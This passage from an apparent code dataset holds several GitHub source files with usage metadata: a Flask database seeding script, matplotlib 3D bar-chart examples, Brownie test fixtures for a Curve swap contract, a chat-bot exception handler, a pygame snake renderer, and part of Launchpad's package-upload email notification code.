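    patched = struct.unpack("q", fh.read(8))[0] + 500   # apply the offset
    fh.seek(0)
    fh.write(struct.pack("q", patched))
    fh.seek(0)
    assert struct.unpack("q", fh.read(8))[0] == 1500
# ----------------------------------------------------------------------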
"line_number": 480, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 483, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 498, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 506, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 506, "usage_type": "attribute"}, {"api_name": "datetime.datetime.combine", "line_number": 513, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 513, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 514, "usage_type": "call"}, {"api_name": "datetime.datetime.timestamp", "line_number": 515, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 515, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 528, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 528, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 529, "usage_type": "call"}, {"api_name": "datetime.datetime.combine", "line_number": 530, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 530, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 531, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 542, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 547, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 557, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 562, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 582, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 588, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 697, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 710, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 1087, "usage_type": "call"}]} +{"seq_id": "23935231603", "text": "from flask_script import Manager\nfrom flask_migrate import Migrate, Manager, MigrateCommand\nfrom sqlalchemy.orm import Session\n\nfrom app import APP\nfrom models import db, Actor, Movie, CareerModel\n\nmigrate = Migrate(APP, db)\nmanager = Manager(APP)\n\nmanager.add_command('db', MigrateCommand)\n\n\n@manager.command\ndef seed_base():\n \"Add seed data to the database\"\n\n session = Session()\n\n actor1 = Actor('Actor1', 20, 'female')\n actor2 = Actor('Actor2', 23, 'male')\n actor3 = Actor('Actor3', 43, 'male')\n\n movie1 = Movie('Movie1', '2017-10-12')\n movie2 = Movie('Movie2', '2017-10-12')\n movie3 = Movie('Movie1', '2017-10-12')\n\n objects = [actor1, actor2, actor3, movie1, movie2, movie3]\n\n db.session.bulk_save_objects(objects)\n db.session.commit()\n\n\n@manager.command\ndef seed_relationship():\n\n career_model11 = CareerModel(1, 1)\n career_model12 = CareerModel(1, 2)\n career_model13 = CareerModel(1, 3)\n career_model21 = CareerModel(2, 1)\n career_model31 = CareerModel(3, 1)\n\n objects = [career_model11, career_model12, career_model13,\n career_model21, career_model31]\n\n db.session.bulk_save_objects(objects)\n db.session.commit()\n\n\nif __name__ == '__main__':\n manager.run()\n", "repo_name": "OvieMudi/capstone", "sub_path": "manage.py", "file_name": "manage.py", "file_ext": "py", "file_size_in_byte": 1240, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask_migrate.Migrate", "line_number": 8, "usage_type": "call"}, {"api_name": "app.APP", "line_number": 8, 
"usage_type": "argument"}, {"api_name": "models.db", "line_number": 8, "usage_type": "argument"}, {"api_name": "flask_migrate.Manager", "line_number": 9, "usage_type": "call"}, {"api_name": "app.APP", "line_number": 9, "usage_type": "argument"}, {"api_name": "flask_migrate.MigrateCommand", "line_number": 11, "usage_type": "argument"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 18, "usage_type": "call"}, {"api_name": "models.Actor", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Actor", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Actor", "line_number": 22, "usage_type": "call"}, {"api_name": "models.Movie", "line_number": 24, "usage_type": "call"}, {"api_name": "models.Movie", "line_number": 25, "usage_type": "call"}, {"api_name": "models.Movie", "line_number": 26, "usage_type": "call"}, {"api_name": "models.db.session.bulk_save_objects", "line_number": 30, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 30, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 30, "usage_type": "name"}, {"api_name": "models.db.session.commit", "line_number": 31, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 31, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 31, "usage_type": "name"}, {"api_name": "models.CareerModel", "line_number": 37, "usage_type": "call"}, {"api_name": "models.CareerModel", "line_number": 38, "usage_type": "call"}, {"api_name": "models.CareerModel", "line_number": 39, "usage_type": "call"}, {"api_name": "models.CareerModel", "line_number": 40, "usage_type": "call"}, {"api_name": "models.CareerModel", "line_number": 41, "usage_type": "call"}, {"api_name": "models.db.session.bulk_save_objects", "line_number": 46, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 46, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 46, "usage_type": "name"}, {"api_name": "models.db.session.commit", "line_number": 47, "usage_type": "call"}, {"api_name": "models.db.session", "line_number": 47, "usage_type": "attribute"}, {"api_name": "models.db", "line_number": 47, "usage_type": "name"}]} +{"seq_id": "34529419881", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib.colors as colors\nimport matplotlib.cm as cm\nfrom matplotlib.ticker import NullFormatter,FormatStrFormatter,FuncFormatter,FixedFormatter,LinearLocator,MultipleLocator,IndexLocator\n\ndef gen_x(n):\n ret = []\n x = np.arange(0, n, 1, dtype=np.int8) #[0,1,2,3,...n 0,1,2,3,...n]\n while n > 0:\n ret.extend(x) \n n-=1 \n return ret\n\ndef gen_y(n):\n ret = []\n indx = 0\n while indx < n:\n ret.extend([indx] * n) #[0,0,0,0...n,1,1,1,1....n]\n indx+=1\n return ret \n\ndef formatValue(v,pos):\n return f\"({v})\" if v < 0 else f\"[{v}]\"\n\n# https://matplotlib.org/stable/gallery/mplot3d/hist3d.html#sphx-glr-gallery-mplot3d-hist3d-py\n# https://www.youtube.com/watch?v=VMuT3llidTk&list=PLA0M1Bcd0w8xQx-X5a6eSEOYULNSnHN_p&index=4\ndef plot_examples_11():\n size_x_y = 73\n \n # Fixing random state for reproducibility\n np.random.seed(19680801)\n\n fig = plt.figure()\n ax_3d = fig.add_subplot(projection='3d')\n \n xpos = gen_x(size_x_y)\n ypos = gen_y(size_x_y)\n\n zpos = 0\n # Construct arrays with the dimensions for the 16 bars.\n dx_size_fig = dy_size_fig = 0.75 * np.ones_like(zpos)\n \n dz_value = np.random.randint(0, 10,size_x_y*size_x_y)\n indx = 0\n for i in dz_value:\n if indx%78==0:\n dz_value[indx] = 25\n indx+=1 \n\n \n # color bar 
(https://stackoverflow.com/questions/11950375/apply-color-map-to-mpl-toolkits-mplot3d-axes3d-bar3d)\n    offset = dz_value + np.abs(0)\n    fracs = offset.astype(float)/offset.max()\n    norm = colors.Normalize(fracs.min(), fracs.max())\n    color_values = cm.jet(norm(fracs.tolist()))\n\n    ax_3d.bar3d(xpos, ypos, zpos, dx_size_fig, dy_size_fig, dz_value, color=color_values,zsort='average')\n    ax_3d.set_xlabel('x')\n    ax_3d.set_ylabel('y')\n    ax_3d.set_zlabel('z')\n    #ax_3d.xaxis.set_major_formatter(FixedFormatter(['',0,'',1,'',2,'',3]))\n    #ax_3d.yaxis.set_major_formatter(FixedFormatter(['',0,'',1,'',2,'',3]))\n    #ax_3d.yaxis.set_major_formatter(formatValue)\n    #ax_3d.set_xlim(xmin=0)\n    #ax_3d.set_ylim(ymin=0)\n    #ax_3d.xaxis.set_major_locator(MultipleLocator(base=1))\n    #ax_3d.yaxis.set_major_locator(MultipleLocator(base=1))\n\n    #ax_3d.xaxis.set_major_formatter(FormatStrFormatter(\"%d\"))\n    #ax_3d.yaxis.set_major_formatter(FormatStrFormatter(\"%d\"))\n    #ax_3d.xaxis.set_major_locator(IndexLocator(base=1,offset=0.35))\n    #ax_3d.yaxis.set_major_locator(IndexLocator(base=1,offset=0.35))\n\n    plt.show()\n\nfrom matplotlib.animation import ArtistAnimation\nimport random\ndef plot_examples_11_animation():\n    size_x_y = 10\n    fig = plt.figure()\n    ax_3d = fig.add_subplot(projection='3d')\n    ax_3d.set_xlabel('x')\n    ax_3d.set_ylabel('y')\n    ax_3d.set_zlabel('z')\n\n    xpos = gen_x(size_x_y)\n    ypos = gen_y(size_x_y)\n    zpos = 0\n    dx_size_fig = dy_size_fig = 0.75\n    dz_value = np.zeros(size_x_y*size_x_y)\n    dz_value[0]=25\n    frames = []\n\n    for i in range(3):\n        for index in range(len(dz_value)):\n            dz_value[index] = dz_value[index]+random.randint(1,6)\n\n        offset = dz_value + np.abs(0)\n        fracs = offset.astype(float)/offset.max()\n        norm = colors.Normalize(fracs.min(), fracs.max())\n        color_values = cm.jet(norm(fracs.tolist()))\n\n        line = ax_3d.bar3d(xpos, ypos, zpos, dx_size_fig, dy_size_fig, dz_value,color=color_values, zsort='average')\n        frames.append([line])\n\n    ani = ArtistAnimation(\n        fig, # the figure to animate\n        frames,# the frames\n        interval=150,# delay between frames in ms\n        blit=True,# double buffering for smooth animation\n        repeat=True # loop the animation\n    )\n    ani.save('output/plot_examples_11_animation.gif', writer='imagemagick', fps=60)\n    plt.show()", "repo_name": "Jekahome/Python_Example", "sub_path": "matplotlib_chart/examples/plot_examples_11.py", "file_name": "plot_examples_11.py", "file_ext": "py", "file_size_in_byte": 3923, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.arange", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.int8", "line_number": 9, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 32, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "numpy.ones_like", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.colors.Normalize", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.cm.jet", "line_number": 56, "usage_type": "call"}, 
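# ----------------------------------------------------------------------
# Illustrative sketch (standalone; not part of the original record): the
# Normalize-then-colormap pattern the bar plots above use -- bar heights
# are scaled into [0, 1] and mapped to one RGBA row per bar.
import numpy as np
import matplotlib.colors as colors
import matplotlib.cm as cm

heights = np.array([1.0, 5.0, 10.0])
norm = colors.Normalize(heights.min(), heights.max())
rgba = cm.jet(norm(heights))
assert rgba.shape == (3, 4)   # RGBA per bar, ready for bar3d(color=...)
# ----------------------------------------------------------------------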
{"api_name": "matplotlib.cm", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 91, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.colors.Normalize", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.cm.jet", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.animation.ArtistAnimation", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}]} +{"seq_id": "1177718561", "text": "import pytest\nfrom brownie import compile_source\n\nINITIAL_PRICES = [int(1.2 * 10**18)] # eur\n\n\n@pytest.fixture(scope=\"module\", autouse=True)\ndef coins(ERC20Mock, accounts):\n yield [ERC20Mock.deploy(name, name, 18, {\"from\": accounts[0]})\n for name in ['USD', 'EUR']]\n\n\n@pytest.fixture(scope=\"module\", autouse=True)\ndef token(CurveTokenV4, accounts):\n yield CurveTokenV4.deploy(\"Curve EUR-USD\", \"crvEURUSD\", {\"from\": accounts[0]})\n\n\ndef _compiled_swap(token, coins, CurveCryptoSwap2):\n path = CurveCryptoSwap2._sources.get_source_path('CurveCryptoSwap2')\n with open(path, 'r') as f:\n source = f.read()\n source = source.replace(\"0x0000000000000000000000000000000000000001\", token.address)\n\n source = source.replace(\"0x0000000000000000000000000000000000000010\", coins[0].address)\n source = source.replace(\"0x0000000000000000000000000000000000000011\", coins[1].address)\n\n source = source.replace(\"1,#0\", str(10 ** (18 - coins[0].decimals())) + ',')\n source = source.replace(\"1,#1\", str(10 ** (18 - coins[1].decimals())) + ',')\n\n return compile_source(source).Vyper\n\n\n@pytest.fixture(scope=\"module\", autouse=True)\ndef compiled_swap(token, coins, CurveCryptoSwap2):\n return _compiled_swap(token, coins, CurveCryptoSwap2)\n\n\ndef _crypto_swap(compiled_swap, token, accounts):\n swap = compiled_swap.deploy(\n accounts[0],\n accounts[0],\n 90 * 2**2 * 10000, # A\n int(2.8e-4 * 1e18), # gamma\n int(8.5e-5 * 1e10), # mid_fee\n int(1.3e-3 * 1e10), # out_fee\n 10**10, # allowed_extra_profit\n int(0.012 * 1e18), # fee_gamma\n int(0.55e-5 * 1e18), # adjustment_step\n 0, # admin_fee\n 600, # ma_half_time\n INITIAL_PRICES[0],\n {'from': accounts[0]})\n token.set_minter(swap, {\"from\": accounts[0]})\n\n return swap\n\n\n@pytest.fixture(scope=\"module\", autouse=True)\ndef crypto_swap(compiled_swap, token, accounts):\n return _crypto_swap(compiled_swap, token, accounts)\n\n\ndef _crypto_swap_with_deposit(crypto_swap, coins, accounts):\n user = accounts[1]\n quantities = [10**6 * 10**36 // p for p in [10**18] + INITIAL_PRICES] # $3M worth\n for coin, q in zip(coins, quantities):\n coin._mint_for_testing(user, q)\n coin.approve(crypto_swap, 2**256-1, {'from': user})\n\n # Very first deposit\n crypto_swap.add_liquidity(quantities, 0, {'from': user})\n\n return 
crypto_swap\n\n\n@pytest.fixture(scope=\"module\")\ndef crypto_swap_with_deposit(crypto_swap, coins, accounts):\n return _crypto_swap_with_deposit(crypto_swap, coins, accounts)\n\n\n@pytest.fixture(autouse=True)\ndef isolation(fn_isolation):\n pass\n", "repo_name": "hoanghiepnb/curve-crypto-contract", "sub_path": "tests/twocrypto/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 2728, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "61", "api": [{"api_name": "pytest.fixture", "line_number": 7, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 13, "usage_type": "call"}, {"api_name": "brownie.compile_source", "line_number": 30, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 33, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 58, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 76, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "12946132372", "text": "import traceback\nfrom io import StringIO\nfrom utils.config import init_config\nfrom utils.text2img import markdownToImg\nfrom graia.ariadne.app import Ariadne\nfrom graia.ariadne.message.chain import MessageChain\nfrom graia.ariadne.message.element import Image, Plain\nfrom graia.ariadne.util.saya import listen\nfrom graia.broadcast.builtin.event import ExceptionThrowed\nfrom graia.ariadne.event.message import GroupMessage\nfrom graia.saya import Channel\n\nchannel = Channel.current()\nmasterNumber = init_config().permission.Master\n\n\n@listen(ExceptionThrowed)\nasync def except_handle(event: ExceptionThrowed):\n if isinstance(event.event, ExceptionThrowed):\n return\n app = Ariadne.current()\n with StringIO() as fp:\n traceback.print_tb(event.exception.__traceback__, file=fp)\n tb = fp.getvalue()\n\n msg = f\"\"\"\\\n## 异常事件:\n{str(event.event.__repr__())}\n## 异常类型:\n`{type(event.exception)}`\n## 异常内容:\n{str(event.exception)}\n## 异常追踪:\n```py\n{tb}\n```\n\n\"\"\"\n\n await app.send_friend_message(\n masterNumber,\n MessageChain(Plain(\"发生了咩有捕获的异常捏\"), Image(path=await markdownToImg(msg))),\n )\n\n\n@listen(GroupMessage)\nasync def error_handler_test(msg: MessageChain):\n if str(msg) == \".错误捕捉测试\":\n raise ValueError(\"错误捕捉测试\")\n", "repo_name": "zzzzz167/Yuki", "sub_path": "cores/errorHandler.py", "file_name": "errorHandler.py", "file_ext": "py", "file_size_in_byte": 1337, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "graia.saya.Channel.current", "line_number": 13, "usage_type": "call"}, {"api_name": "graia.saya.Channel", "line_number": 13, "usage_type": "name"}, {"api_name": "utils.config.init_config", "line_number": 14, "usage_type": "call"}, {"api_name": "graia.broadcast.builtin.event.ExceptionThrowed", "line_number": 18, "usage_type": "name"}, {"api_name": "graia.broadcast.builtin.event.ExceptionThrowed", "line_number": 19, "usage_type": "argument"}, {"api_name": "graia.ariadne.app.Ariadne.current", "line_number": 21, "usage_type": "call"}, {"api_name": "graia.ariadne.app.Ariadne", "line_number": 21, "usage_type": "name"}, {"api_name": "io.StringIO", "line_number": 22, "usage_type": "call"}, {"api_name": "traceback.print_tb", "line_number": 23, "usage_type": "call"}, {"api_name": "graia.ariadne.message.chain.MessageChain", "line_number": 42, "usage_type": "call"}, {"api_name": "graia.ariadne.message.element.Plain", "line_number": 42, 
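# ----------------------------------------------------------------------
# Illustrative sketch (standard library only; not part of the original
# record): the StringIO + traceback.print_tb pattern except_handle above
# uses to turn a live traceback into text for the report.
import traceback
from io import StringIO

try:
    1 / 0
except ZeroDivisionError as exc:
    with StringIO() as fp:
        traceback.print_tb(exc.__traceback__, file=fp)
        tb = fp.getvalue()
assert tb   # formatted frames, ready to embed in a message
# ----------------------------------------------------------------------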
"usage_type": "call"}, {"api_name": "graia.ariadne.message.element.Image", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.text2img.markdownToImg", "line_number": 42, "usage_type": "call"}, {"api_name": "graia.ariadne.util.saya.listen", "line_number": 17, "usage_type": "call"}, {"api_name": "graia.broadcast.builtin.event.ExceptionThrowed", "line_number": 17, "usage_type": "argument"}, {"api_name": "graia.ariadne.message.chain.MessageChain", "line_number": 47, "usage_type": "name"}, {"api_name": "graia.ariadne.util.saya.listen", "line_number": 46, "usage_type": "call"}, {"api_name": "graia.ariadne.event.message.GroupMessage", "line_number": 46, "usage_type": "argument"}]} +{"seq_id": "38573485240", "text": "import pygame\nimport math\n\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\n\nCOLOURS = [\n (230, 25, 75),\n (60, 180, 75),\n (255, 225, 25),\n (0, 130, 200),\n (245, 130, 48),\n (145, 30, 180),\n (70, 240, 240),\n (240, 50, 230),\n (210, 245, 60),\n (250, 190, 212),\n (0, 128, 128),\n (220, 190, 255),\n (170, 110, 40),\n (255, 250, 200),\n (128, 0, 0),\n (170, 255, 195),\n (128, 128, 0),\n (255, 215, 180),\n (0, 0, 128),\n (128, 128, 128),\n]\n\nclass Window:\n def __init__(self, window, game, width, height):\n self.game = game\n self.window = window\n \n # The scoreboard is where all the scores will be printed\n self.scoreboard = pygame.Surface(self.window.get_size())\n self.font = pygame.font.SysFont(None, 24)\n\n\n # Create some constants (assuming area is square)\n self.tile_size = math.floor(min(self.window.get_size()) / self.game.grid_size[1])\n self.body_size = math.floor(self.tile_size * 0.9)\n self.body_tile_offset = (self.tile_size - self.body_size) / 2\n self.candy_radius = self.tile_size * 0.6 / 2\n\n def update(self):\n BLACK = (0, 0, 0)\n self.window.fill(BLACK)\n\n # Draw snake\n for index, snake in enumerate(self.game.snakes):\n for position in snake:\n pygame.draw.rect(self.window, COLOURS[index], (\n (position[0] * self.tile_size) + self.body_tile_offset, \n (position[1] * self.tile_size) + self.body_tile_offset, \n self.body_size, self.body_size\n ))\n\n # Draw candies\n for candy in self.game.candies:\n pygame.draw.circle(self.window, COLOURS[-1], (\n (candy[0] + 0.5) * self.tile_size, \n (candy[1] + 0.5) * self.tile_size, \n ), self.candy_radius)\n\n", "repo_name": "Rayman/coding-challenge-snakes", "sub_path": "window.py", "file_name": "window.py", "file_ext": "py", "file_size_in_byte": 1882, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pygame.Surface", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.font.SysFont", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 37, "usage_type": "attribute"}, {"api_name": "math.floor", "line_number": 41, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 53, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 61, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 61, "usage_type": "attribute"}]} +{"seq_id": "36042340434", "text": "__metaclass__ = type\n\n__all__ = [\n 'notify',\n ]\n\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.utils import formataddr\nimport os\n\nfrom zope.component import getUtility\n\nfrom 
lp.app.interfaces.launchpad import ILaunchpadCelebrities\nfrom lp.archivepublisher.utils import get_ppa_reference\nfrom lp.archiveuploader.changesfile import ChangesFile\nfrom lp.archiveuploader.utils import (\n ParseMaintError,\n safe_fix_maintainer,\n )\nfrom lp.registry.interfaces.person import IPersonSet\nfrom lp.registry.interfaces.pocket import PackagePublishingPocket\nfrom lp.services.config import config\nfrom lp.services.encoding import (\n ascii_smash,\n guess as guess_encoding,\n )\nfrom lp.services.mail.helpers import get_email_template\nfrom lp.services.mail.sendmail import (\n format_address,\n format_address_for_person,\n sendmail,\n )\nfrom lp.services.webapp import canonical_url\nfrom lp.soyuz.interfaces.archivepermission import IArchivePermissionSet\n\n\ndef reject_changes_file(blamer, changes_file_path, changes, archive,\n distroseries, reason, logger=None):\n \"\"\"Notify about a rejection where all of the details are not known.\n\n :param blamer: The `IPerson` that is to blame for this notification.\n :param changes_file_path: The path to the changes file.\n :param changes: A dictionary of the parsed changes file.\n :param archive: The `IArchive` the notification is regarding.\n :param distroseries: The `IDistroSeries` the notification is regarding.\n :param reason: The reason for the rejection.\n \"\"\"\n ignored, filename = os.path.split(changes_file_path)\n information = {\n 'SUMMARY': reason,\n 'CHANGESFILE': '',\n 'DATE': '',\n 'CHANGEDBY': '',\n 'MAINTAINER': '',\n 'SIGNER': '',\n 'ORIGIN': '',\n 'ARCHIVE_URL': '',\n 'USERS_ADDRESS': config.launchpad.users_address,\n }\n subject = '%s rejected' % filename\n if archive and archive.is_ppa:\n subject = '[PPA %s] %s' % (get_ppa_reference(archive), subject)\n information['ARCHIVE_URL'] = '\\n%s' % canonical_url(archive)\n template = get_template(archive, 'rejected')\n body = template % information\n to_addrs = get_upload_notification_recipients(\n blamer, archive, distroseries, logger, changes=changes)\n debug(logger, \"Sending rejection email.\")\n if not to_addrs:\n debug(logger, \"No recipients have a preferred email.\")\n return\n send_mail(None, archive, to_addrs, subject, body, False, logger=logger)\n\n\ndef get_template(archive, action):\n \"\"\"Return the appropriate e-mail template.\"\"\"\n template_name = 'upload-'\n if action in ('new', 'accepted', 'announcement'):\n template_name += action\n elif action == 'unapproved':\n template_name += 'accepted'\n elif action == 'rejected':\n template_name += 'rejection'\n if archive.is_ppa:\n template_name = 'ppa-%s' % template_name\n template_name += '.txt'\n return get_email_template(template_name, app='soyuz')\n\n\nACTION_DESCRIPTIONS = {\n 'new': 'New',\n 'unapproved': 'Waiting for approval',\n 'rejected': 'Rejected',\n 'accepted': 'Accepted',\n 'announcement': 'Accepted',\n }\n\n\ndef calculate_subject(spr, bprs, customfiles, archive, distroseries,\n pocket, action):\n \"\"\"Return the e-mail subject for the notification.\"\"\"\n suite = distroseries.getSuite(pocket)\n names = set()\n version = '-'\n if spr:\n names.add(spr.name)\n version = spr.version\n elif bprs:\n names.add(bprs[0].build.source_package_release.name)\n version = bprs[0].build.source_package_release.version\n for custom in customfiles:\n names.add(custom.libraryfilealias.filename)\n name_str = ', '.join(names)\n subject = '[%s/%s] %s %s (%s)' % (\n distroseries.distribution.name, suite, name_str, version,\n ACTION_DESCRIPTIONS[action])\n if archive.is_ppa:\n subject = '[PPA %s] %s' % 
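# ----------------------------------------------------------------------
# Illustrative sketch (standalone; not part of the original record): the
# template-name assembly performed by get_template above, traced for a
# hypothetical PPA rejection.
template_name = 'upload-'
action, is_ppa = 'rejected', True
if action in ('new', 'accepted', 'announcement'):
    template_name += action
elif action == 'unapproved':
    template_name += 'accepted'
elif action == 'rejected':
    template_name += 'rejection'
if is_ppa:
    template_name = 'ppa-%s' % template_name
assert template_name + '.txt' == 'ppa-upload-rejection.txt'
# ----------------------------------------------------------------------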
(get_ppa_reference(archive), subject)\n return subject\n\n\ndef notify(blamer, spr, bprs, customfiles, archive, distroseries, pocket,\n summary_text=None, changes=None, changesfile_content=None,\n changesfile_object=None, action=None, dry_run=False,\n logger=None, announce_from_person=None, previous_version=None):\n \"\"\"Notify about an upload or package copy.\n\n :param blamer: The `IPerson` who is to blame for this notification.\n :param spr: The `ISourcePackageRelease` that was created.\n :param bprs: A list of `IBinaryPackageRelease` that were created.\n :param customfiles: An `ILibraryFileAlias` that was created.\n :param archive: The target `IArchive`.\n :param distroseries: The target `IDistroSeries`.\n :param pocket: The target `PackagePublishingPocket`.\n :param summary_text: The summary of the notification.\n :param changes: A dictionary of the parsed changes file.\n :param changesfile_content: The raw content of the changes file, so it\n can be attached to the mail if desired.\n :param changesfile_object: The raw object of the changes file. Only used\n to work out the filename for `reject_changes_file`.\n :param action: A string of what action to notify for, such as 'new',\n 'accepted'.\n :param dry_run: If True, only log the mail.\n :param announce_from_person: If passed, use this `IPerson` as the From: in\n announcement emails. If the person has no preferred email address,\n the person is ignored and the default From: is used instead.\n :param previous_version: If specified, the change log on the email will\n include all of the source package's change logs after that version\n up to and including the passed spr's version.\n \"\"\"\n # If this is a binary or mixed upload, we don't send *any* emails\n # provided it's not a rejection or a security upload:\n if (\n bprs and action != 'rejected' and\n pocket != PackagePublishingPocket.SECURITY):\n debug(logger, \"Not sending email; upload is from a build.\")\n return\n\n if spr and spr.source_package_recipe_build and action == 'accepted':\n debug(logger, \"Not sending email; upload is from a recipe.\")\n return\n\n if spr is None and not bprs and not customfiles:\n # We do not have enough context to do a normal notification, so\n # reject what we do have.\n if changesfile_object is None:\n return\n reject_changes_file(\n blamer, changesfile_object.name, changes, archive, distroseries,\n summary_text, logger=logger)\n return\n\n # \"files\" will contain a list of tuples of filename,component,section.\n # If files is empty, we don't need to send an email if this is not\n # a rejection.\n try:\n files = build_uploaded_files_list(spr, bprs, customfiles, logger)\n except LanguagePackEncountered:\n # Don't send emails for language packs.\n return\n\n if not files and action != 'rejected':\n return\n\n recipients = get_upload_notification_recipients(\n blamer, archive, distroseries, logger, changes=changes, spr=spr,\n bprs=bprs)\n\n # There can be no recipients if none of the emails are registered\n # in LP.\n if not recipients:\n debug(logger, \"No recipients on email, not sending.\")\n return\n\n if action == 'rejected':\n default_recipient = \"%s <%s>\" % (\n config.uploader.default_recipient_name,\n config.uploader.default_recipient_address)\n if not recipients:\n recipients = [default_recipient]\n debug(logger, \"Sending rejection email.\")\n summarystring = summary_text\n else:\n summary = build_summary(spr, files, action)\n if summary_text:\n summary.append(summary_text)\n summarystring = \"\\n\".join(summary)\n\n attach_changes = 
not archive.is_ppa\n\n def build_and_send_mail(action, recipients, from_addr=None, bcc=None,\n previous_version=None):\n subject = calculate_subject(\n spr, bprs, customfiles, archive, distroseries, pocket, action)\n body = assemble_body(\n blamer, spr, bprs, archive, distroseries, summarystring, changes,\n action, previous_version=previous_version)\n body = body.encode(\"utf8\")\n send_mail(\n spr, archive, recipients, subject, body, dry_run,\n changesfile_content=changesfile_content,\n attach_changes=attach_changes, from_addr=from_addr, bcc=bcc,\n logger=logger)\n\n build_and_send_mail(\n action, recipients, previous_version=previous_version)\n\n info = fetch_information(spr, bprs, changes)\n from_addr = info['changedby']\n if announce_from_person is not None:\n if announce_from_person.preferredemail is not None:\n from_addr = format_address_for_person(announce_from_person)\n\n # If we're sending an acceptance notification for a non-PPA upload,\n # announce if possible. Avoid announcing backports, binary-only\n # security uploads, or autosync uploads.\n if (action == 'accepted' and distroseries.changeslist\n and not archive.is_ppa\n and pocket != PackagePublishingPocket.BACKPORTS\n and not (pocket == PackagePublishingPocket.SECURITY and spr is None)\n and not is_auto_sync_upload(spr, bprs, pocket, from_addr)):\n name = None\n bcc_addr = None\n if spr:\n name = spr.name\n elif bprs:\n name = bprs[0].build.source_package_release.name\n if name:\n email_base = distroseries.distribution.package_derivatives_email\n if email_base:\n bcc_addr = email_base.format(package_name=name)\n\n build_and_send_mail(\n 'announcement', [str(distroseries.changeslist)], from_addr,\n bcc_addr, previous_version=previous_version)\n\n\ndef assemble_body(blamer, spr, bprs, archive, distroseries, summary, 